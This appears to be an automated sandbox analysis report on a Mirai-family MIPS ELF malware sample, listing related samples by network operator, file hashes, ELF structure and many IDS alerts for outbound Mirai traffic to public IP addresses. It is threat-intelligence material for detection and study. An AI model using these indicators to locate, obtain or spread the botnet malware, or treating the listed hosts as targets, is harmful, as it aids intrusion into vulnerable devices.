	U3FsHbHDDh.elf	Get hash	malicious	Mirai	Browse	41.145.207.245
	R5MVQjQRSK.elf	Get hash	malicious	Mirai	Browse	41.151.218.255
ALGTEL-ASDZ	uR2hnJKQGC.elf	Get hash	malicious	Mirai	Browse	41.106.43.141
	F13Qfddhfp.elf	Get hash	malicious	Mirai	Browse	41.105.231.126
	o76OXXA64s.elf	Get hash	malicious	Mirai	Browse	41.102.136.81
	nDBq0aXLc9.elf	Get hash	malicious	Unknown	Browse	41.106.222.6
	prkdxMl4PN.elf	Get hash	malicious	Mirai	Browse	41.102.161.12
	sora.x86.elf	Get hash	malicious	Mirai	Browse	41.97.63.134
	mpsl-20240214-0634.elf	Get hash	malicious	Mirai, Moobot	Browse	41.200.121.245
	mips-20240214-0633.elf	Get hash	malicious	Mirai, Moobot	Browse	154.254.140.4
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	41.101.17.127
	arm.elf	Get hash	malicious	Mirai, Moobot	Browse	197.115.194.114
KDDIKDDICORPORATIONJP	ru39M5F21m.elf	Get hash	malicious	Mirai	Browse	59.247.33.81
	prkdxMl4PN.elf	Get hash	malicious	Mirai	Browse	111.98.122.82
	lGeRX8rqsG.elf	Get hash	malicious	Mirai	Browse	163.61.118.79
	wtN5CU3IaE.elf	Get hash	malicious	Mirai	Browse	14.101.205.134
	sora.arm.elf	Get hash	malicious	Mirai	Browse	106.164.129.80
	mpsl-20240214-0634.elf	Get hash	malicious	Mirai, Moobot	Browse	157.71.220.32
	NOlIc3Xhv8.elf	Get hash	malicious	Mirai	Browse	175.133.231.53
	IXPFqwlkuB.elf	Get hash	malicious	Mirai	Browse	210.230.246.138
	b3astmode.x86.elf	Get hash	malicious	Mirai	Browse	106.161.213.159
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	157.108.11.229
USCC-MPLS01US	822oN1h72g.elf	Get hash	malicious	Mirai	Browse	198.227.1.215
	2XcXiCaqz1.elf	Get hash	malicious	Mirai	Browse	198.227.165.20
	sora.arm.elf	Get hash	malicious	Mirai	Browse	198.227.165.17
	Mg26cnzn88.elf	Get hash	malicious	Mirai	Browse	166.236.86.192
	jDKTcSFHLy.elf	Get hash	malicious	Mirai, Okiru	Browse	198.227.1.225
	IkQaegr1Ld.elf	Get hash	malicious	Mirai	Browse	166.224.223.118
	rYAJAFi7do.elf	Get hash	malicious	Mirai	Browse	166.236.23.123
	vbLINaY1Ls.elf	Get hash	malicious	Mirai	Browse	198.227.116.61
	skyljne.x86.elf	Get hash	malicious	Mirai	Browse	166.237.245.81
	vYjGXXZLDW.elf	Get hash	malicious	Mirai	Browse	198.227.165.40
SCINTERNETUS	J5GOte7gxA.elf	Get hash	malicious	Mirai	Browse	216.241.200.173
	3euWJJGI7C.elf	Get hash	malicious	Mirai	Browse	216.241.200.163
	mgTb7D13xo.elf	Get hash	malicious	Mirai	Browse	216.241.195.227
	FOLWQXX83l.elf	Get hash	malicious	Mirai	Browse	216.241.195.210
	Blfg4JNiBh.elf	Get hash	malicious	Unknown	Browse	216.241.200.184
	VVjaJD5jsB.elf	Get hash	malicious	Mirai	Browse	23.180.228.93
	67XTl7gWb4.elf	Get hash	malicious	Mirai	Browse	216.241.195.224
	i5nBIIxIJq.elf	Get hash	malicious	Mirai, Moobot	Browse	23.180.228.57
	nWxpwCHcaT.elf	Get hash	malicious	Mirai	Browse	23.180.228.96
	1V8BqLuuRA.elf	Get hash	malicious	Unknown	Browse	216.241.195.231

File type:	ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	5.482215301280724
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	E6l0C6FObI.elf
File size:	105'116 bytes
MD5:	e21f23ebe6bea02a2b38ed8b892fcc50
SHA1:	4982c3733fcd4a8315f0ca2c47d4d0a98e429dfa
SHA256:	630cfde6992fd4c30f0a93ea553acf8b480cb93b7cf06f80bfa827ef384cee20
SHA512:	f9c244f0d1b75e7cad606573c64c72ed6e79c2e3dad1fa8be4ebb8c71b5388814cb8ce7b33b0c77eca82f3a6d0c9550ed730c11442c51554287079ecb5d98ba8
SSDEEP:	1536:RvMKs9oRHbfZT7EQYEWiGlCvaGe1Cs2ooKfALVZPpzKA/:RvMKs9oRHbfJ7fW5lsarVILV
TLSH:	64A3B616BF310FF7E8ABCC3719A51705198C650A22F97B35BA34D818F64B25F1AE3960
File Content Preview:	.ELF....................`.@.4...l.......4. ...(...............@...@.P...P...............T...T.E.T.E.................Q.td...............................<...'!......'.......................<...'!... .........9'.. ........................<...'!.............9

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x400260
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	104556
Section Header Size:	40
Number of Section Headers:	14
Header String Table Index:	13

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x8c	0x0	0x6	AX	4
.text	PROGBITS	0x400120	0x120	0x18430	0x0	0x6	AX	16
.fini	PROGBITS	0x418550	0x18550	0x5c	0x0	0x6	AX	4
.rodata	PROGBITS	0x4185b0	0x185b0	0xba0	0x0	0x2	A	16
.ctors	PROGBITS	0x459154	0x19154	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x45915c	0x1915c	0x8	0x0	0x3	WA	4
.data.rel.ro	PROGBITS	0x459168	0x19168	0x4	0x0	0x3	WA	4
.data	PROGBITS	0x459170	0x19170	0x250	0x0	0x3	WA	16
.got	PROGBITS	0x4593c0	0x193c0	0x448	0x4	0x10000003	WAp	16
.sbss	NOBITS	0x459808	0x19808	0x24	0x0	0x10000003	WAp	4
.bss	NOBITS	0x459830	0x19808	0x340	0x0	0x3	WA	16
.mdebug.abi32	PROGBITS	0x72c	0x19808	0x0	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x19808	0x64	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x19150	0x19150	5.4897	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x19154	0x459154	0x459154	0x6b4	0xa1c	4.0670	0x6	RW	0x10000	.ctors .dtors .data.rel.ro .data .got .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Download Network PCAP: filtered – full

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.1595.68.11.20059206802839471 02/14/24-09:30:11.643542	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59206	80	192.168.2.15	95.68.11.200
192.168.2.15112.166.212.5552944802839471 02/14/24-09:28:49.299902	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52944	80	192.168.2.15	112.166.212.55
192.168.2.1595.211.247.16432972802839471 02/14/24-09:29:38.517012	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	32972	80	192.168.2.15	95.211.247.164
192.168.2.1595.100.100.7049146802839471 02/14/24-09:30:31.545066	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49146	80	192.168.2.15	95.100.100.70
192.168.2.1595.163.141.10035438802839471 02/14/24-09:29:19.037392	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35438	80	192.168.2.15	95.163.141.100
192.168.2.15112.167.244.20459956802839471 02/14/24-09:30:34.346873	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59956	80	192.168.2.15	112.167.244.204
192.168.2.15112.121.179.13460588802839471 02/14/24-09:30:29.619568	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60588	80	192.168.2.15	112.121.179.134
192.168.2.1595.101.253.21057328802839471 02/14/24-09:30:31.536430	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57328	80	192.168.2.15	95.101.253.210
192.168.2.1595.167.23.1745826802839471 02/14/24-09:30:43.761363	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45826	80	192.168.2.15	95.167.23.17
192.168.2.1588.221.105.18538792802839471 02/14/24-09:30:16.578437	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38792	80	192.168.2.15	88.221.105.185
192.168.2.1595.43.199.25060442802839471 02/14/24-09:29:13.571891	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60442	80	192.168.2.15	95.43.199.250
192.168.2.1595.100.185.22839508802839471 02/14/24-09:30:59.656689	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39508	80	192.168.2.15	95.100.185.228
192.168.2.1595.101.187.6148162802839471 02/14/24-09:29:35.282739	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48162	80	192.168.2.15	95.101.187.61
192.168.2.1595.110.224.25060494802839471 02/14/24-09:29:05.609109	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60494	80	192.168.2.15	95.110.224.250
192.168.2.1595.49.0.20857094802839471 02/14/24-09:29:08.989994	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57094	80	192.168.2.15	95.49.0.208
192.168.2.15112.85.242.20144192802839471 02/14/24-09:30:09.286325	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44192	80	192.168.2.15	112.85.242.201
192.168.2.1595.141.128.20050714802839471 02/14/24-09:29:05.664029	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50714	80	192.168.2.15	95.141.128.200
192.168.2.1595.86.78.14654268802839471 02/14/24-09:28:47.616648	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54268	80	192.168.2.15	95.86.78.146
192.168.2.1595.101.214.3556312802839471 02/14/24-09:30:21.588243	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56312	80	192.168.2.15	95.101.214.35
192.168.2.1588.212.252.12049512802839471 02/14/24-09:31:16.444367	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49512	80	192.168.2.15	88.212.252.120
192.168.2.1595.153.253.4558916802839471 02/14/24-09:29:08.781543	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58916	80	192.168.2.15	95.153.253.45
192.168.2.1595.244.58.8333966802839471 02/14/24-09:30:44.630447	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33966	80	192.168.2.15	95.244.58.83
192.168.2.1595.142.121.3434276802839471 02/14/24-09:30:11.623507	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34276	80	192.168.2.15	95.142.121.34
192.168.2.1588.220.84.18660332802839471 02/14/24-09:29:19.501376	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60332	80	192.168.2.15	88.220.84.186
192.168.2.1595.81.32.4139368802839471 02/14/24-09:30:52.951399	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39368	80	192.168.2.15	95.81.32.41
192.168.2.15112.83.36.6245420802839471 02/14/24-09:30:36.982645	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45420	80	192.168.2.15	112.83.36.62
192.168.2.1595.100.51.15049448802839471 02/14/24-09:29:56.731548	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49448	80	192.168.2.15	95.100.51.150
192.168.2.15112.45.120.18759888802839471 02/14/24-09:29:22.117430	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59888	80	192.168.2.15	112.45.120.187
192.168.2.15112.45.120.18759886802839471 02/14/24-09:29:22.114845	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59886	80	192.168.2.15	112.45.120.187
192.168.2.15112.74.103.11151472802839471 02/14/24-09:29:01.726292	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51472	80	192.168.2.15	112.74.103.111
192.168.2.1595.58.75.22149394802839471 02/14/24-09:29:19.100236	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49394	80	192.168.2.15	95.58.75.221
192.168.2.1588.174.163.10660954802839471 02/14/24-09:30:19.606172	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60954	80	192.168.2.15	88.174.163.106
192.168.2.1588.150.154.8943550802839471 02/14/24-09:29:40.557095	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43550	80	192.168.2.15	88.150.154.89
192.168.2.1595.79.128.16557886802839471 02/14/24-09:28:56.086124	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57886	80	192.168.2.15	95.79.128.165
192.168.2.1588.221.230.14442514802839471 02/14/24-09:30:08.380688	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42514	80	192.168.2.15	88.221.230.144
192.168.2.1595.181.231.22646230802839471 02/14/24-09:30:53.105817	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46230	80	192.168.2.15	95.181.231.226
192.168.2.1595.58.114.13949862802839471 02/14/24-09:30:24.552039	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49862	80	192.168.2.15	95.58.114.139
192.168.2.1595.141.36.14636812802839471 02/14/24-09:29:38.534025	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36812	80	192.168.2.15	95.141.36.146
192.168.2.1595.181.203.4443532802839471 02/14/24-09:29:08.750037	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43532	80	192.168.2.15	95.181.203.44
192.168.2.1595.42.29.20150536802839471 02/14/24-09:30:59.704800	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50536	80	192.168.2.15	95.42.29.201
192.168.2.1595.216.175.5938118802839471 02/14/24-09:30:33.984536	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38118	80	192.168.2.15	95.216.175.59
192.168.2.1588.216.129.12251042802839471 02/14/24-09:30:00.863592	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51042	80	192.168.2.15	88.216.129.122
192.168.2.1595.100.53.4955624802839471 02/14/24-09:28:57.744321	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55624	80	192.168.2.15	95.100.53.49
192.168.2.1595.101.14.8657698802839471 02/14/24-09:29:35.314523	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57698	80	192.168.2.15	95.101.14.86
192.168.2.1595.84.249.5746630802839471 02/14/24-09:30:37.298135	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46630	80	192.168.2.15	95.84.249.57
192.168.2.1595.211.60.13055122802839471 02/14/24-09:30:14.130736	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55122	80	192.168.2.15	95.211.60.130
192.168.2.1595.217.7.13544636802839471 02/14/24-09:30:59.698562	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44636	80	192.168.2.15	95.217.7.135
192.168.2.1588.198.147.17440722802839471 02/14/24-09:29:15.463004	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40722	80	192.168.2.15	88.198.147.174
192.168.2.1595.181.129.22056122802839471 02/14/24-09:30:19.657488	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56122	80	192.168.2.15	95.181.129.220
192.168.2.1595.215.140.734720802839471 02/14/24-09:30:52.968460	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34720	80	192.168.2.15	95.215.140.7
192.168.2.15112.186.20.3859798802839471 02/14/24-09:30:59.252997	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59798	80	192.168.2.15	112.186.20.38
192.168.2.15112.187.12.11156622802839471 02/14/24-09:31:20.467140	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56622	80	192.168.2.15	112.187.12.111
192.168.2.1595.101.16.15158734802839471 02/14/24-09:29:56.519559	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58734	80	192.168.2.15	95.101.16.151
192.168.2.1595.85.210.22436270802839471 02/14/24-09:30:48.374166	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36270	80	192.168.2.15	95.85.210.224
192.168.2.1595.111.218.6334790802839471 02/14/24-09:28:47.699644	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34790	80	192.168.2.15	95.111.218.63
192.168.2.1595.86.82.147552802839471 02/14/24-09:30:24.722511	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47552	80	192.168.2.15	95.86.82.1
192.168.2.1595.217.25.15034422802839471 02/14/24-09:29:42.750446	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34422	80	192.168.2.15	95.217.25.150
192.168.2.15112.165.98.5937194802839471 02/14/24-09:30:37.753827	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37194	80	192.168.2.15	112.165.98.59
192.168.2.1595.58.76.15736418802839471 02/14/24-09:28:47.692129	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36418	80	192.168.2.15	95.58.76.157
192.168.2.1595.101.142.19459116802839471 02/14/24-09:29:05.592924	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59116	80	192.168.2.15	95.101.142.194
192.168.2.1595.100.251.10742384802839471 02/14/24-09:29:09.708497	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42384	80	192.168.2.15	95.100.251.107
192.168.2.1595.100.245.13147714802839471 02/14/24-09:30:50.491498	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47714	80	192.168.2.15	95.100.245.131
192.168.2.1595.101.3.19146918802839471 02/14/24-09:29:24.633960	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46918	80	192.168.2.15	95.101.3.191
192.168.2.1595.158.244.2936510802839471 02/14/24-09:29:29.717200	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36510	80	192.168.2.15	95.158.244.29
192.168.2.1595.166.153.20150462802839471 02/14/24-09:29:29.687043	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50462	80	192.168.2.15	95.166.153.201
192.168.2.15112.127.183.25356418802839471 02/14/24-09:31:05.847533	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56418	80	192.168.2.15	112.127.183.253
192.168.2.1595.73.170.17547280802839471 02/14/24-09:28:55.841909	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47280	80	192.168.2.15	95.73.170.175
192.168.2.1595.164.62.16746354802839471 02/14/24-09:30:53.678962	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46354	80	192.168.2.15	95.164.62.167
192.168.2.15112.223.39.2933812802839471 02/14/24-09:28:47.093985	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33812	80	192.168.2.15	112.223.39.29
192.168.2.15112.74.18.10633192802839471 02/14/24-09:29:54.963770	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33192	80	192.168.2.15	112.74.18.106
192.168.2.1595.143.149.19359914802839471 02/14/24-09:29:57.053016	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59914	80	192.168.2.15	95.143.149.193
192.168.2.15112.185.157.9047802802839471 02/14/24-09:30:13.949038	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47802	80	192.168.2.15	112.185.157.90
192.168.2.15112.126.92.4752440802839471 02/14/24-09:31:12.841885	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52440	80	192.168.2.15	112.126.92.47
192.168.2.15112.222.35.15840938802839471 02/14/24-09:29:48.338599	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40938	80	192.168.2.15	112.222.35.158
192.168.2.15112.200.187.951780802839471 02/14/24-09:29:27.149485	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51780	80	192.168.2.15	112.200.187.9
192.168.2.1595.127.222.12157020802839471 02/14/24-09:29:40.613939	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57020	80	192.168.2.15	95.127.222.121
192.168.2.1595.134.64.16355098802839471 02/14/24-09:30:37.227998	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55098	80	192.168.2.15	95.134.64.163
192.168.2.1595.59.137.356688802839471 02/14/24-09:29:46.521625	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56688	80	192.168.2.15	95.59.137.3
192.168.2.1595.216.114.3251392802839471 02/14/24-09:29:05.609447	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51392	80	192.168.2.15	95.216.114.32
192.168.2.1595.168.78.359198802839471 02/14/24-09:30:23.896672	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59198	80	192.168.2.15	95.168.78.3
192.168.2.15112.186.20.3859690802839471 02/14/24-09:30:55.205815	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59690	80	192.168.2.15	112.186.20.38
192.168.2.1595.101.181.5339168802839471 02/14/24-09:29:54.450278	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39168	80	192.168.2.15	95.101.181.53
192.168.2.1595.141.251.24936532802839471 02/14/24-09:31:09.838797	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36532	80	192.168.2.15	95.141.251.249
192.168.2.1595.101.47.9135212802839471 02/14/24-09:29:24.641128	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35212	80	192.168.2.15	95.101.47.91
192.168.2.15112.171.68.22752590802839471 02/14/24-09:30:03.879540	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52590	80	192.168.2.15	112.171.68.227
192.168.2.15112.47.11.21053568802839471 02/14/24-09:29:03.983740	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53568	80	192.168.2.15	112.47.11.210
192.168.2.1595.255.93.9242718802839471 02/14/24-09:29:05.627978	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42718	80	192.168.2.15	95.255.93.92
192.168.2.1595.59.121.5345162802839471 02/14/24-09:29:40.401154	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45162	80	192.168.2.15	95.59.121.53
192.168.2.1595.7.114.10339656802839471 02/14/24-09:30:43.784052	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39656	80	192.168.2.15	95.7.114.103
192.168.2.15112.74.127.2247730802839471 02/14/24-09:29:00.314833	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47730	80	192.168.2.15	112.74.127.22
192.168.2.1588.218.158.21359270802839471 02/14/24-09:29:33.853105	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59270	80	192.168.2.15	88.218.158.213
192.168.2.1595.59.243.12938848802839471 02/14/24-09:30:48.161309	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38848	80	192.168.2.15	95.59.243.129
192.168.2.1595.100.190.3637162802839471 02/14/24-09:31:17.689597	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37162	80	192.168.2.15	95.100.190.36
192.168.2.1595.100.185.3740640802839471 02/14/24-09:29:15.504414	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40640	80	192.168.2.15	95.100.185.37
192.168.2.1595.216.6.2636432802839471 02/14/24-09:30:29.841357	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36432	80	192.168.2.15	95.216.6.26
192.168.2.1595.101.88.18635044802839471 02/14/24-09:30:43.733535	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35044	80	192.168.2.15	95.101.88.186
192.168.2.1588.99.168.21236206802839471 02/14/24-09:30:31.339860	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36206	80	192.168.2.15	88.99.168.212
192.168.2.15112.135.219.6851420802839471 02/14/24-09:29:00.287610	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51420	80	192.168.2.15	112.135.219.68
192.168.2.1595.100.179.11447876802839471 02/14/24-09:30:48.091961	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47876	80	192.168.2.15	95.100.179.114
192.168.2.15112.25.57.4354646802839471 02/14/24-09:31:02.778009	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54646	80	192.168.2.15	112.25.57.43
192.168.2.1595.216.127.24942706802839471 02/14/24-09:29:57.507595	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42706	80	192.168.2.15	95.216.127.249
192.168.2.15112.184.60.5138690802839471 02/14/24-09:29:03.705439	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38690	80	192.168.2.15	112.184.60.51
192.168.2.1595.58.54.9239562802839471 02/14/24-09:30:24.760817	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39562	80	192.168.2.15	95.58.54.92
192.168.2.1595.101.149.14956100802839471 02/14/24-09:30:37.193296	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56100	80	192.168.2.15	95.101.149.149
192.168.2.1595.128.42.20250708802839471 02/14/24-09:30:06.424087	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50708	80	192.168.2.15	95.128.42.202
192.168.2.1595.164.22.1036698802839471 02/14/24-09:30:59.771528	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36698	80	192.168.2.15	95.164.22.10
192.168.2.1595.164.1.12654004802839471 02/14/24-09:30:11.615893	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54004	80	192.168.2.15	95.164.1.126
192.168.2.1595.101.70.2356420802839471 02/14/24-09:31:13.059367	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56420	80	192.168.2.15	95.101.70.23
192.168.2.1595.86.102.4056872802839471 02/14/24-09:30:14.786063	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56872	80	192.168.2.15	95.86.102.40
192.168.2.1595.240.204.19436554802839471 02/14/24-09:31:13.069495	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36554	80	192.168.2.15	95.240.204.194
192.168.2.1595.216.18.10151720802839471 02/14/24-09:29:56.523011	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51720	80	192.168.2.15	95.216.18.101
192.168.2.1595.57.101.21447620802839471 02/14/24-09:30:48.588020	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47620	80	192.168.2.15	95.57.101.214
192.168.2.1588.28.177.6441816802839471 02/14/24-09:30:16.641450	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41816	80	192.168.2.15	88.28.177.64
192.168.2.1595.181.228.16439936802839471 02/14/24-09:30:06.794584	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39936	80	192.168.2.15	95.181.228.164
192.168.2.1595.111.232.9350378802839471 02/14/24-09:29:33.432165	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50378	80	192.168.2.15	95.111.232.93
192.168.2.1595.100.189.2548516802839471 02/14/24-09:29:51.661319	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48516	80	192.168.2.15	95.100.189.25
192.168.2.1595.217.150.10844132802839471 02/14/24-09:29:56.522497	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44132	80	192.168.2.15	95.217.150.108
192.168.2.1595.101.19.6344014802839471 02/14/24-09:29:56.521559	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44014	80	192.168.2.15	95.101.19.63
192.168.2.1595.216.123.18251872802839471 02/14/24-09:29:56.764313	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51872	80	192.168.2.15	95.216.123.182
192.168.2.1588.221.226.6455164802839471 02/14/24-09:30:00.960733	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55164	80	192.168.2.15	88.221.226.64
192.168.2.1595.100.53.4955572802839471 02/14/24-09:28:56.050828	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55572	80	192.168.2.15	95.100.53.49
192.168.2.1588.84.219.10350440802839471 02/14/24-09:30:19.190524	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50440	80	192.168.2.15	88.84.219.103
192.168.2.15112.213.32.23832960802839471 02/14/24-09:30:08.906175	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	32960	80	192.168.2.15	112.213.32.238
192.168.2.1595.216.204.25436962802839471 02/14/24-09:29:19.025452	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36962	80	192.168.2.15	95.216.204.254
